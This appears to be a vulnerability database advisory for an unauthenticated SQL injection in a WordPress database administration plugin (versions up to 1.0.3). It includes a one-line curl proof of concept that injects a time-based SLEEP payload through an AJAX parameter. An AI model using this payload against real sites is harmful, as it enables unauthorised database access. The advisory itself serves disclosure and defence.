Lucene search

K
wpvulndbChristiaan SwiersWPVDB-ID:873824F0-E8B1-45BD-8579-BC3C649A54E5
HistoryJul 24, 2023 - 12:00 a.m.

WordPress Database Administrator <= 1.0.3 - Unauthenticated SQL Injection

2023-07-2400:00:00
Christiaan Swiers
wpscan.com
22
wordpress
admin
unauthenticated
sql injection
ajax
security

0.004 Low

EPSS

Percentile

74.4%

Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

PoC

Run the command: curl -i -s -k -X POST --data-binary "action=wdaSetTableActionResponse&amp;table;=wp_users%20WHERE%20SLEEP(1)=1%20&amp;request;=browse" "https://example.com/wp-admin/admin-ajax.php" and see that the response is slow due to the SLEEP function.

0.004 Low

EPSS

Percentile

74.4%

Related for WPVDB-ID:873824F0-E8B1-45BD-8579-BC3C649A54E5